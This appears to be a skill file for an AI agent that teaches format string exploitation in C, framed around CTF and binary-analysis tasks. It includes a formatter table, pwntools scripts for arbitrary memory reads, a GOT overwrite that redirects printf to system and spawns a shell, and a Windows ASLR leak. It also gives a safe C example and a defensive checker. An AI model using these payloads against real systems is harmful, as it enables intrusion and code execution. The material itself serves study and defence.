skills/binary-exploitation/format-strings/format-strings/SKILL.md
How to exploit format string vulnerabilities in C programs. Use this skill whenever the user mentions format strings, printf vulnerabilities, sprintf/fprintf issues, GOT overwrites, arbitrary memory read/write, stack leaks, or any C program that takes user input as a format string. Also trigger for CTF challenges involving format string bugs, pwn tasks with printf-family functions, or when analyzing binaries for format string vulnerabilities.
Format string vulnerabilities occur when user-controlled input is passed as the format string argument to printf-family functions (printf, sprintf, fprintf). This allows attackers to read from and write to arbitrary memory addresses.
The printf function expects a format string as its first parameter, followed by values to substitute. When an attacker controls the format string, they can:
- %x, %s, %p to leak stack values
- %n to write the number of bytes printed to an address

| Formatter | Purpose |
|-----------|----------|
| %x | Print 4 bytes as hex |
| %08x | Print 4 bytes as 8 hex digits (zero-padded) |
| %d | Print as integer |
| %s | Print as string (reads from address) |
| %p | Print pointer address |
| %n | Write byte count to address |
| %hn | Write 2 bytes to address |
| %<n>$x | Direct parameter access (nth argument) |
| %<n>$s | Read string from nth parameter address |
| %<n>$n | Write to nth parameter address |
Before exploiting, you need to find where your input lands on the stack. Send a known pattern followed by format specifiers and increment until you see your pattern.
Use the script scripts/find_offset.py, which automates this process.

```python
# Manual approach
for i in range(1, 20):
    payload = b"AAAA%" + str(i).encode() + b"$x"
    # Send payload, check if "41414141" appears in output
```
Use %<n>$s to read from an arbitrary address. The nth parameter should be the address you want to read.
Why this matters: it lets you leak memory contents.
Example:
```python
from pwn import *

p = process('./vulnerable_binary')
# Our input starts at parameter 4 here (found with scripts/find_offset.py):
# '%6$s' occupies param 4, the padding param 5, and the address param 6.
payload = b'%6$s'          # Read a string from the 6th parameter
payload += b'xxxx'         # Padding (5th parameter)
payload += p32(0x8048000)  # 6th parameter = address to read; it goes last because
                           # its little-endian bytes start with a NUL, which would end the format string
p.sendline(payload)
print(p.clean())           # Shows memory at 0x8048000
```
The %n formatter writes the number of bytes printed so far to an address. To write arbitrary values:
- %.<count>x prints exactly <count> hex characters
- %hn: Write only 2 bytes (useful for 32-bit addresses)

Why two steps: Writing a full 32-bit address like 0x08049724 would require printing 134,000,000+ characters. Using %hn twice (2 bytes each) is much more efficient.
GOT Overwrite Pattern:
The Global Offset Table (GOT) contains addresses of external functions. Overwriting a GOT entry redirects function calls.
Use the script: scripts/got_overwrite_template.py for a ready-to-use template.
```python
from pwn import *

elf = context.binary = ELF('./vulnerable_binary')
libc = elf.libc
p = process()              # runs context.binary

offset = 6                 # stack offset of our input; replace with the value from scripts/find_offset.py

# Overwrite printf's GOT entry with system's address
# (libc.sym['system'] is only correct once libc.address is set, or with ASLR disabled)
payload = fmtstr_payload(offset, {elf.got['printf']: libc.sym['system']})
p.sendline(payload)
# Now printf() calls system()
p.sendline(b'/bin/sh')
p.interactive()
```
On Windows x64, the first 4 parameters are in registers (RCX, RDX, R8, R9). When a format string is used without varargs, %p reads from R9, often leaking a stable pointer.
Use the script: scripts/windows_aslr_bypass.py for this technique.
Why this works: The leaked pointer has a known offset within the module. Subtract the offset to get the base address, then calculate all other addresses.
```python
# Leak R9 via %p
# received_output: the "0x..." pointer string the target printed
# KNOWN_OFFSET: offset of the leaked pointer within its module, found during local reversing
leaked = int(received_output, 16)
base = leaked - KNOWN_OFFSET
```
Vulnerable:
```c
#include <stdio.h>

char buffer[30];
gets(buffer);    // User input
printf(buffer);  // DANGEROUS: user input is used as the format string
```
Safe:
```c
#include <stdio.h>

char buffer[30];
fgets(buffer, sizeof buffer, stdin);  // bounded read; gets() has no length limit
printf("%s", buffer);                 // Safe: the format string is a constant
```
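As an added defensive example (not one of this skill's scripts), a small Python checker that flags printf-family calls whose format argument is not a string literal, which is exactly the pattern in the vulnerable snippet above. The function table, the tokenizer and the sample C source are the example's own constructions.

```python
import re
# printf-family functions and the 0-based index of their format argument (example's own table).
FORMAT_ARG = {"printf": 0, "vprintf": 0, "fprintf": 1, "sprintf": 1, "vfprintf": 1,
              "vsprintf": 1, "snprintf": 2, "vsnprintf": 2, "syslog": 1}
CALL_RE = re.compile(r"\b(" + "|".join(FORMAT_ARG) + r")\s*\(")
# Tokens: a "..." literal (escapes allowed), a single ( ) or , or a run of other chars.
TOKEN_RE = re.compile(r'"(?:\\.|[^"\\])*"|[(),]|[^"(),]+')

def split_args(src, start):
    """Split the argument list of the call whose '(' is at src[start], honouring
    nested parentheses and string literals. Returns None if the call is unterminated."""
    depth, args, cur = 0, [], []
    for tok in TOKEN_RE.finditer(src, start):
        t = tok.group()
        if t == "(":
            depth += 1
            if depth == 1:          # the call's own opening parenthesis
                continue
        elif t == ")":
            depth -= 1
            if depth == 0:          # end of the call: flush the last argument
                args.append("".join(cur).strip())
                return [a for a in args if a]
        elif t == "," and depth == 1:   # top-level separator
            args.append("".join(cur).strip())
            cur = []
            continue
        cur.append(t)
    return None

def find_nonliteral_formats(src):
    """Return (line, function, format_arg) for each printf-family call with a non-literal format."""
    findings = []
    for m in CALL_RE.finditer(src):
        func, args = m.group(1), split_args(src, m.end() - 1)
        if args is None or FORMAT_ARG[func] >= len(args):
            continue                # unterminated call or too few arguments
        fmt = args[FORMAT_ARG[func]]
        if not fmt.startswith('"'):
            findings.append((src.count("\n", 0, m.start()) + 1, func, fmt))
    return findings

# Constructed sample source: the dangerous calls are on lines 3 and 5.
SAMPLE_C = ('char buf[30];\nfgets(buf, sizeof buf, stdin);\nprintf(buf);\n'
            'printf("%s", buf);\nfprintf(stderr, buf);\n'
            'snprintf(out, sizeof out, "%d (%s)", n, buf);\n')

for line, func, fmt in find_nonliteral_formats(SAMPLE_C):
    print(f"line {line}: {func}() takes non-literal format {fmt!r}")
```

The checker does not skip comments or macros, so treat its output as review candidates; compiling with -Wformat -Wformat-security gives the same class of warning from the compiler itself.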
Scripts and helpers:

- scripts/find_offset.py - Brute force stack offset
- fmtstr_payload() or manual construction - build the write payload
- scripts/got_overwrite_template.py - GOT overwrite exploit template
- scripts/windows_aslr_bypass.py - Windows x64 ASLR bypass